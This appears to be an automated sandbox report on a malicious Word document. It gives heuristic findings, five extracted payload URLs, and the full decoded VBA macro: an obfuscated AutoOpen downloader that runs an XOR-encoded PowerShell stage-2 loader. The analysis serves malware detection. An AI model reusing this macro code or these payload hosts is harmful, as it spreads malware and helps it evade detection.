MALICIOUS
192
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is triggered upon opening, and it uses the Shell() function to execute a command. This command likely downloads and executes a second-stage payload, as indicated by the critical OLE_VBA_SHELL heuristic. The macro's obfuscated nature and the use of Shell() suggest a downloader or droppper functionality.
Heuristics 8
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
pWOzih = FJbUNB = 29264 / jRwQQX + 58101 / ChrW(3144) / crGRw + ChrW(CGCnkM) * 67628 + ChrB(39016 * CInt(knSKWP) * 18547 - Hex(orOHX)) + sILVM - Int(nbXIN) * (NLNiS - zSfdEU) iYUfPKwpCC = fCuDYirLd + Shell(zNmCwdqc + XzQkriH + qNQnMbGhAM, 449875782 - 449875782) + aipBb jtQOtK = PvVji - SqShYF / (bbFBU + Oct(tNXAsU) - 46943 + Log(qNrJfV)) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.magento2xpert.com/kXrF1MB/ Referenced by macro
- http://www.sculpey.jmfdev.com/UHu2/Referenced by macro
- http://www.churchneworleans.org/QwESZ/Referenced by macro
- http://www.oglipus.com/47d0X/Referenced by macro
- http://www.philbackes.com/QukNyVR/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14333 bytes |
SHA-256: d87f986d8e6bb65bf2096f6ca44b11e1ad01d84b90261df6d1e63efabb2793ac |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
260 of 425 identifiers look randomly generated (e.g. 'ffEDBvEwBlv') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZjYdsOkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "SChBGUOG"
Function pMbLvm()
On Error Resume Next
lnoqji = HPSEo - YwiFW / (lSsFMt + Oct(isIFKH) - 93604 + Log(cwaabj))
MWwVF = tEnIS = 38759 / ZDKECN + 62309 / ChrW(75852) / ulkqti + ChrW(UYLcqQ) * 59800 + ChrB(72483 * CInt(tXhIEB) * 99930 - Hex(CDzGNQ)) + JlcbNl - Int(RKPSj) * (sqJYY - Ipzif)
aHkil = RippclosE + Chr(sEfoEzv + vbKeyP + jdpiFU) + "owe" + "rs"
boPLjF = djaNU - muGiz / (RzzhV + Oct(PzFNOF) - 18479 + Log(rLpjsn))
brZlV = AXdjc = 71663 / bshbwJ + 22 / ChrW(27265) / KHzrVw + ChrW(EfvMZ) * 81052 + ChrB(3019 * CInt(aYFiUf) * 42250 - Hex(VCGkQz)) + RjwchS - Int(izEXZE) * (YUlqBB - DRtTo)
zpLGE = tVjLq - EHiOd / (JwCoZY + Oct(NnIQs) - 59849 + Log(ppolNN))
DDsuX = nOizn = 91052 / WaiGu + 35051 / ChrW(39148) / vPRVD + ChrW(VbEWlK) * 74474 + ChrB(25725 * CInt(FnzXbj) * 53012 - Hex(bJwWR)) + ipaTMI - Int(aYUvRn) * (bBlZJ - ZSwutX)
pMbLvm = NapDCS + aHkil + JPmrJPLkw + tKmQjEo + RGGiUfwUCCp
YtOUZW = rXbllz - BnaAHS / (LKUdD + Oct(FLpRRQ) - 94004 + Log(DroDsw))
NtDupu = EWuDTT = 68464 / RLPmjr + 32549 / ChrW(72133) / njQkP + ChrW(sBPkw) * 6099 + ChrB(97381 * CInt(kiXIRN) * 23404 - Hex(LqOYc)) + aizwH - Int(GJdPpC) * (CEinX - RfIMj)
End Function
Sub AutoOpen()
On Error Resume Next
Uqpcz = QBGYkS - DdzTw / (zXDfq + Oct(FmZvP) - 64416 + Log(QtIubr))
iaTzn = RdFHEQ = 70365 / jurWf + 72204 / ChrW(60782) / JTUCLz + ChrW(mzOTDj) * 68365 + ChrB(2978 * CInt(POnhkJ) * 25359 - Hex(MWUzz)) + NNfwQz - Int(lQUiSK) * (zjjAsK - Rzwzz)
Application.Run "YcuAbN", pMbLvm
ITlwC = tsUMBB - FlHjT / (dizaU + Oct(mwYNP) - 10455 + Log(EuJpt))
duoqIv = qHdUiz = 61382 / iRKwI + 84775 / ChrW(3871) / FqqmBI + ChrW(iVbNoE) * 68329 + ChrB(23671 * CInt(umOfv) * 53497 - Hex(iSQKrk)) + isbDiA - Int(JfhMv) * (ClrwzE - EVdWwd)
End Sub
Function YcuAbN(XzQkriH)
On Error Resume Next
OhlEjs = zzlzPK - uVWYLT / (jwTISb + Oct(TwjXY) - 7868 + Log(zZURJ))
JwFKQf = wsiSOw = 6151 / AXLtRm + 30499 / ChrW(5238) / fFGuw + ChrW(vwNwJ) * 7341 + ChrB(46512 * CInt(jvZNu) * 25636 - Hex(wTCLE)) + wwbzt - Int(kiLYAB) * (nWAzts - ziwsZV)
nSURai = iEKfZr - wqJPK / (zBwJKY + Oct(JFWPE) - 83092 + Log(ZETKzZ))
pWOzih = FJbUNB = 29264 / jRwQQX + 58101 / ChrW(3144) / crGRw + ChrW(CGCnkM) * 67628 + ChrB(39016 * CInt(knSKWP) * 18547 - Hex(orOHX)) + sILVM - Int(nbXIN) * (NLNiS - zSfdEU)
iYUfPKwpCC = fCuDYirLd + Shell(zNmCwdqc + XzQkriH + qNQnMbGhAM, 449875782 - 449875782) + aipBb
jtQOtK = PvVji - SqShYF / (bbFBU + Oct(tNXAsU) - 46943 + Log(qNrJfV))
uIBiF = dAbWNt = 45001 / mUKHBU + 59101 / ChrW(47546) / uaiBzs + ChrW(wRlYC) * 84974 + ChrB(94799 * CInt(EzkJiz) * 3087 - Hex(TInkI)) + wEtWa - Int(HXYfI) * (XvIzf - WkCDkV)
End Function
Function JPmrJPLkw()
On Error Resume Next
fOWzPM = bHWsP - qntFY / (jNaZR + Oct(iRwPb) - 25610 + Log(jtHjUX))
UzIlQ = JlYSDM = 13518 / qVuiwv + 54681 / ChrW(11965) / wIdjSQ + ChrW(iTBjlL) * 53700 + ChrB(455 * CInt(ikaEEP) * 46644 - Hex(RwScSK)) + cOSMcm - Int(rVjnjL) * (sittA - LBBaj)
muSVsCwsJzv = "hell " + Chr(40) + " " + Chr(40) + "107" + ",44 ," + " 61, 35" + " ,114 " + ",33, " + "42 , 56,9" + "8 , 32 " + ", 45 " + ",37, 4" + "2 , 44," + "59,11"
ZTBHh = IjWJu - aruzT / (DDRNOo + Oct(IGqSOr) - 42487 + Log(knRuk))
bZjQV = iWKaRv = 56438 / zWEpF + 48555 / ChrW(63575) / NMfJBi + ChrW(jGYiGp) * 13322 + ChrB(57165 * CInt(EftLH) * 43164 - Hex(fjihWC)) + PwkjMX - Int(MkwsaT) * (NWTsst - ZfVoqO)
ffEDBvEwBlv = "1 ,1 ,4" + "2 ,5" + "9, 97 , 2" + "4,42 , 45" + " , 12 , " + "35,38 ,"
juhpB = dRVcSE - bUKPCK / (JGtPt + Oct(GcKKS) - 71210 + Log(LjzLkm))
EldAKw = TtfhCH = 76065 / iLFNi + 47227 / ChrW(17753) / RHRYw + ChrW(EdDinw) * 35541 + ChrB(77093 * CInt(DqqoM) * 21268 - Hex(MkizBb)) + hFUuT - Int(ssaod) * (BiTUos - wBXnjw)
QvaEQIs = " 42 ,3" + "3 , 59" + ",116" + ", 10" + "7 ,41," + " 41 ,2" + "4 ,114 ," + " 104 , 3" + "9 , 59 "
iVjZo = FqZOCz - WsfFP / (abLINq + Oct(wpCENG) - 75376 + Log(Bzwjjh))
LjIqCk = TirHlY = 47477 / ZBRvwh + 2518 / ChrW(14825) / KhFnv + ChrW(zfPVM) * 49852 + ChrB(95645 * CInt(NJLnz) * 36388 - Hex(jMZOH)) + toqHJb - Int(fViFXI) * (bVDMXb - EmltDo)
WlLlz = ",59 ,63" + " ,117 , " + "96, 96, 5" + "6, 56 ,56" + " , 97 " + ",34, 46"
QDlCmE = aEERr - irCnNI / (PlmzR + Oct(uQjWtj) - 12133 + Log(XJdNUP))
lvpJZb = MGjiNN = 63341 / MSiIi + 30899 / ChrW(76073) / AwKLV + ChrW(hYfIop) * 30259 + ChrB(37646 * CInt(QDUcv) * 45432 - Hex(sZIinf)) + bDWzao - Int(OQGUZ) * (wFZrC - OREJnr)
rWjFsduwop = " , 40 ,4" + "2,33," + " 59,3" + "2,12" + "5 , 5" + "5, 63" + " ,42," + "61 ,"
cOcASO = jwinMv - zRERaD / (OsTOvE + Oct(zHadt) - 18931 + Log(azMirz))
htAIz = NXPRw = 58486 / ifRll + 12357 / ChrW(18718) / uiLilM + ChrW(iYast) * 97039 + ChrB(66490 * CInt(mrSSjs) * 32748 - Hex(wFkus)) + rbOFmm - Int(paNAG) * (qqDlWz - iuTncs)
QSdcOWrp = " 59 " + ",97 ," + " 44 , 3" + "2 , 34 " + ", 96, " + "36, 23," + "61,9 ," + "126 , 2 ," + "13 ,96" + ",15, 3" + "9,59" + ", 59 ,63,"
sZzKD = hdOVC = 79095 / OVJmX + 20843 / ChrW(55242) / qEKSlz + ChrW(TsjiE) * 30953 + ChrB(42466 * CInt(VDrwf) * 37961 - Hex(EaEGUF)) + aLhWaB - Int(nsSKL) * (WmUlm - BnjjOz)
zAjNi = RfRYBh - UziLZl / (KWSFT + Oct(bDAqi) - 35405 + Log(KDUDi))
oDhPkTwi = " 117,9" + "6 , 9" + "6 ,56,5" + "6 , 56,9" + "7, 60, 44" + ", 58, 35," + "63, 42 ,"
htdENT = zXCFX = 13670 / cFbhiu + 21452 / ChrW(3765) / fbtiH + ChrW(RiihlE) * 50564 + ChrB(63473 * CInt(ElPWD) * 1267 - Hex(TXpwEb)) + Zjcffw - Int(TlvRGY) * (qVYCYK - siowNj)
VtLbp = FzJZui - lATFzc / (cCQuf + Oct(JjEnj) - 35451 + Log(Vzrkp))
NoKCwKRUC = "54 , 97," + " 37, 3" + "4, 41,43" + " , 42," + " 57 , 9" + "7 , 4" + "4, 32, " + "34,96 , " + "26 , 7, " + "58 ,125," + "96,15,39," + " 59 ,59"
jVtLz = pXrrK = 66573 / kOfTc + 32883 / ChrW(92550) / hYsWs + ChrW(URnJjQ) * 61730 + ChrB(92991 * CInt(irRlpt) * 34810 - Hex(uFfhzp)) + PTtswz - Int(pGjVF) * (ibSVo - zcKfG)
PiwRNu = bItPX - zBiBLF / (oNHSm + Oct(tksCE) - 77695 + Log(NiPCYt))
GThIlwzz = " , 63 " + ",117," + "96 , 9" + "6, 56, 56" + ",56 ,97 " + ", 44 , 3" + "9,58, 61,"
BdwoLv = qOOazZ = 74221 / CbfiCB + 69872 / ChrW(67532) / pbkaP + ChrW(fdRTSK) * 32488 + ChrB(36445 * CInt(rcCVd) * 53108 - Hex(OAXjn)) + uqkRu - Int(zkKHbc) * (zhFUfl - ZmZwO)
ijMkC = wIiajB - aTVjV / (tudYJj + Oct(ufzHRm) - 4562 + Log(MPYaEs))
RpwiO = " 44 , " + "39 , " + "33 , " + "42 , 56" + " ,32," + "61, 35" + " ,42,46,3" + "3 , 60" + ",97, " + "32 , 61"
JPmrJPLkw = muSVsCwsJzv + ffEDBvEwBlv + QvaEQIs + WlLlz + rWjFsduwop + QSdcOWrp + oDhPkTwi + NoKCwKRUC + GThIlwzz + RpwiO
aOGWSP = oDFDX = 40478 / ALCEL + 76215 / ChrW(35918) / bJzzb + ChrW(DzGRi) * 30386 + ChrB(37746 * CInt(RmNcj) * 82672 - Hex(CNOhiL)) + VWtFL - Int(nwZTo) * (kFzmpF - ltPqjD)
RYwiRz = zbjYc - EbUNu / (nGoCaY + Oct(maKFjK) - 3224 + Log(wPAqBr))
End Function
Function tKmQjEo()
On Error Resume Next
ldPOMA = KZCvuQ = 41561 / VVJpKc + 78295 / ChrW(43236) / NbVGM + ChrW(XtztU) * 19721 + ChrB(76151 * CInt(MbzPl) * 6453 - Hex(PlNVtf)) + LjQwHL - Int(lfhwF) * (CzWBSi - zOKND)
TwpHk = oqhQd - CcLaw / (RfYhR + Oct(MCKVj) - 94810 + Log(DtorB))
XowRicavC = ", 40,96," + "30, 56 " + ",10 ," + "28 ,21" + ",96 , " + "15 ,39," + " 59 , 5"
XwfRoV = tdPGwX = 34765 / vXumha + 89953 / ChrW(65864) / SHkuZ + ChrW(OkJiYW) * 73166 + ChrB(27774 * CInt(LjWjmE) * 44306 - Hex(fiHVt)) + UVdOX - Int(jlnTzB) * (pstVJ - KbzEL)
DvvEPR = UioIv - OPDaw / (jlihT + Oct(IwMjiW) - 33316 + Log(SUClj))
uMAsktMAfD = "9,63 " + ", 117, 96" + " , 9" + "6 , 5" + "6,56 , 5" + "6, 97 , " + "32 , 40"
BrjrA = wNvtGA = 3029 / cKUOb + 37302 / ChrW(13808) / wkASr + ChrW(puNRtY) * 1806 + ChrB(85668 * CInt(rjinv) * 6119 - Hex(ddVPp)) + zoJNQ - Int(uvqitU) * (BjoHd - jGdht)
MQdHXw = ohuYIj - SzIAz / (SXCmoW + Oct(OFBWGQ) - 63071 + Log(RRoTl))
XKZPs = " , 3" + "5 , 38," + "63, 58 ,6" + "0 , 97," + " 44, 32," + " 34 , 96," + "123, " + "120, 43 " + ", 127 ,23" + ", 96 ,15," + " 39 ,5" + "9, 59,6"
fpHHj = Vilwck = 7159 / oOqTB + 9506 / ChrW(25075) / jXRrzD + ChrW(fUjLX) * 74114 + ChrB(65299 * CInt(fIvXjT) * 6529 - Hex(WMSQDb)) + ShEzJ - Int(pobRhG) * (wYfbGT - KFhjP)
dufjnz = zOiTp - LpUUF / (NZzwjr + Oct(kPKMz) - 46212 + Log(jGvIui))
SZuXmmNV = "3,117 " + ", 96 , 9" + "6 ,56," + " 56 ,56 ," + " 97,63 ," + " 39 ,38, " + "35, 45" + " , 4" + "6 ,4" + "4, 36" + " ,42 , 6"
BihtMl = HWqlch = 2731 / fwwpd + 24209 / ChrW(77749) / BfvHsF + ChrW(LZbOLu) * 30555 + ChrB(8489 * CInt(FbctT) * 52501 - Hex(qjcaw)) + FAXNp - Int(ORioCc) * (LBSpJP - ijBjuV)
IEaQi = AUbrwE - pCbnaR / (PVXrTK + Oct(jWwnS) - 39125 + Log(FMDYX))
hYsEfL = "0, 9" + "7,44 ,32," + " 34 , 9" + "6, 30,58" + " , 36, " + "1,54, 25," + " 29,96,1" + "04 , 97" + ",28 ,63 " + ",35,38"
irabqE = CbHOJd = 63736 / njjzU + 79603 / ChrW(39639) / cDfkck + ChrW(XOClJX) * 91409 + ChrB(92856 * CInt(PdEEO) * 68907 - Hex(pnwSjU)) + DrJtzY - Int(TERlk) * (HrXmrk - iqlQks)
qzfRJ = nzuzi - YpvZmS / (jWzPJa + Oct(ksMFtJ) - 9206 + Log(UWYzch))
ZBTooRHRBjJ = " ,59 , " + "103, 10" + "4 , 15 ," + " 104, 1" + "02 , " + "116,107"
IzXIt = umQzz = 12518 / CshWr + 27573 / ChrW(34653) / moGVtZ + ChrW(ZBmqv) * 45962 + ChrB(28206 * CInt(sBhjqG) * 92096 - Hex(wCwwc)) + CINPRV - Int(RmAna) * (PMGKk - spUKfb)
qhJSzc = kwdcjG - qaOjvQ / (ftpsLI + Oct(zhwioc) - 60208 + Log(HUDKhd))
cmFVwHw = " , 29" + ",5 ,38" + ", 111,114" + ", 111,1" + "04, 1" + "23 , 119," + " 124 , 10" + "4 , "
jiiiv = OFdjK = 92485 / nUalU + 17752 / ChrW(70539) / furdN + ChrW(Sudli) * 28925 + ChrB(28209 * CInt(LNhNj) * 70914 - Hex(UwdjUo)) + uRpYsA - Int(jmAho) * (LAwbhv - JMEHdz)
KvOzsa = zMvKWO - bbjfr / (PUABzY + Oct(iiMiv) - 86516 + Log(toXCo))
pbciGuDoSb = "116,107,4" + "1,38,34," + "114 " + ",107 ," + "42, 33" + " , 57" + " , 117 ," + " 59 , " + "42,34, 63" + " , 100 , "
tKmQjEo = XowRicavC + uMAsktMAfD + XKZPs + SZuXmmNV + hYsEfL + ZBTooRHRBjJ + cmFVwHw + pbciGuDoSb
QMoCR = hXhkY = 52548 / KZquMz + 38208 / ChrW(29872) / RzNOd + ChrW(MnDdr) * 54845 + ChrB(47320 * CInt(jwkor) * 75937 - Hex(zoHJim)) + tLFUz - Int(vopCh) * (KuhujJ - VJwcJc)
FULGFv = JtsYW - JIrJhH / (dBPtX + Oct(wQtzi) - 92613 + Log(XKadiz))
End Function
Function RGGiUfwUCCp()
On Error Resume Next
NAApVN = cMSmvB = 29637 / DERiFz + 230 / ChrW(30419) / KciGzh + ChrW(akUzc) * 2294 + ChrB(51019 * CInt(JUTDb) * 19737 - Hex(ucYGWL)) + snNkDi - Int(jZdfDM) * (hPWCi - Zkfwom)
iBhsL = arhmr - viauqY / (zbNMC + Oct(sRaHH) - 33227 + Log(RGLhsk))
ZqFRzvE = "104 , 19" + ",104, 10" + "0, 1" + "07 ,2" + "9,5 ,38" + ",100 ,104" + " , 9"
zlTzd = EiPwqp = 44623 / owUof + 77296 / ChrW(36904) / zkZUvj + ChrW(TtBFFY) * 23822 + ChrB(14746 * CInt(jYzKC) * 54357 - Hex(SujcK)) + tNwANl - Int(aJjYtw) * (ojRsc - HFHoJj)
TGaOD = czoJFK - YmZpbQ / (Wcico + Oct(VinGH) - 83101 + Log(NPTiUU))
pcLGcU = "7 ,42," + " 55,42, " + "104," + " 116 , 41" + " , 32" + ",61 , 42" + ",46, 4" + "4,39,1" + "03 ,1"
TFzZM = BQVfSM = 85650 / ArYwaD + 17297 / ChrW(88570) / iBNjM + ChrW(SrUHB) * 72982 + ChrB(33857 * CInt(IPGwFN) * 15897 - Hex(vwzNXv)) + tQGZtQ - Int(wBoGC) * (zFqsjO - iUEDj)
uGPjz = XHbqvM - LkQEK / (KUqpHH + Oct(JjBYMC) - 86346 + Log(WRjVpV))
KjzndbC = "07 , " + "53 ,43 ," + " 53, " + "111, 38" + ", 33 ," + "111,1"
jWPvjK = iSQuF = 42102 / DQHZVc + 82376 / ChrW(12142) / dtTjp + ChrW(hjUcf) * 76602 + ChrB(39763 * CInt(MbTGCj) * 16799 - Hex(wXFSB)) + vTtoaT - Int(CMbNLl) * (Zcqvjp - wCVoXt)
wwdXR = nBjrN - pJOst / (zbsUjJ + Oct(LjzRXz) - 5574 + Log(ZFQzpt))
AfTOoUNiBb = "07, 41, 4" + "1 , 24," + " 102 ,52," + "59 ,61,5" + "4 , 52,1" + "07,44 " + ", 61,"
uYswii = ljJcw = 48705 / TcPUo + 12607 / ChrW(46071) / jLrKaP + ChrW(wuDzR) * 63965 + ChrB(38031 * CInt(hbAKvO) * 15248 - Hex(BdIFdA)) + BmIFoj - Int(XIlhl) * (YAHkA - hsnwc)
bQqhSK = zRBKJc - uaEsZO / (tWAVXF + Oct(TkNqfd) - 25756 + Log(QqpbG))
HVfDkNZhn = "35,97," + " 11,32, " + "56,3" + "3, 35,3" + "2 ,46,43" + ", 9, 38 "
wWqwIV = GovWO = 97337 / tpLuEz + 58128 / ChrW(65190) / TdwRiK + ChrW(CwHow) * 99396 + ChrB(19495 * CInt(PkXMv) * 35399 - Hex(RfiWb)) + vWJJPi - Int(UKDbw) * (sYGKmu - nfUZRm)
zLTmI = iHbwij - mCEjw / (UZvLU + Oct(cvrQCj) - 85221 + Log(NXJrRT))
laDcp = ",35 , " + "42, 10" + "3,10" + "7 , 53 ," + "43 , 53, " + "99 , 11" + "1,107 , 4" + "1 ,38" + ", 34, 10" + "2,116" + " , 28,5"
slzHf = dskan = 56688 / SwEAw + 88820 / ChrW(60854) / rrYOmE + ChrW(PtNPd) * 5753 + ChrB(53939 * CInt(zDomzD) * 12254 - Hex(OFqJRT)) + sXnZA - Int(YstAZd) * (MYAwqH - wJHjk)
BKIvum = kUspdb - ZKvmZa / (dqFsT + Oct(NMjPG) - 79950 + Log(tOjwF))
lwhWNX = "9, 4" + "6,61 , " + "59 ,98,31" + ", 61" + " , 3" + "2 ,44 , 4" + "2,60 " + ", 60 ," + " 111, " + "107,41," + " 38, 34 " + ", 116 ,"
hHrfKV = OjlOV = 13432 / WYTDC + 53472 / ChrW(56517) / XlcinM + ChrW(Lawjm) * 85716 + ChrB(15486 * CInt(KvXEvj) * 52791 - Hex(uzfsU)) + jwiJzj - Int(DbhCN) * (KRpUR - mIHfX)
BvPiiI = fQuAC - tYfHTp / (hLQDF + Oct(NiimYQ) - 12585 + Log(znrVsZ))
AiQwBsRwYS = "45 , 6" + "1 ,42, 4" + "6 , " + "36 , 11" + "6,50" + ",44 ," + " 46,59" + " , 44 , " + "39,52, 5" + "0,50" + Chr(41) + " |FORe"
hEQRmr = pHBnq = 41271 / qfLcD + 89447 / ChrW(79880) / iVjvBw + ChrW(nmbQTA) * 13139 + ChrB(529 * CInt(Sopoal) * 71401 - Hex(laHIfs)) + isjavi - Int(pbFTOM) * (BAjiY - PEAXs)
JKbpcH = mlbQjE - bwNjH / (YAjaX + Oct(GiZarM) - 64742 + Log(ZjOmd))
NtdJCt = "ach " + "{[char]" + Chr(40) + "$" + "_ -B" + "Xor " + "0x4F " + Chr(41) + " } " + Chr(41) + " -join" + " '' | &" + Chr(40) + " " + "$PsHO" + "me[4]" + Chr(43) + "$pSho" + "me[30]" + Chr(43) + "'"
Vaoaj = ZUiQr = 33681 / WLIaA + 32841 / ChrW(96546) / KMLjE + ChrW(tfukaG) * 91284 + ChrB(2261 * CInt(MJqUDm) * 209 - Hex(iawLA)) + FNViK - Int(NdqfE) * (pojQLU - MwRKw)
OKDcJI = tOoWFb - qkiSLQ / (wLcSO + Oct(pnUoDZ) - 70427 + Log(zKBhXR))
iQCtIo = "X'" + Chr(41) + " "
RGGiUfwUCCp = ZqFRzvE + pcLGcU + KjzndbC + AfTOoUNiBb + HVfDkNZhn + laDcp + lwhWNX + AiQwBsRwYS + NtdJCt + iQCtIo
azKKjj = bNzzfW = 34450 / aJujzG + 88695 / ChrW(1019) / fqpra + ChrW(kozkVM) * 35910 + ChrB(15404 * CInt(rLLGoE) * 88037 - Hex(dAkrn)) + Thjzqf - Int(unBfOK) * (mvmHBP - munLOl)
Lqqpzz = DpNbcl - YKbZtN / (hOcqXB + Oct(mtnctQ) - 68517 + Log(LpQNAj))
End Function
Attribute VB_Name = "ncZcVzb"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.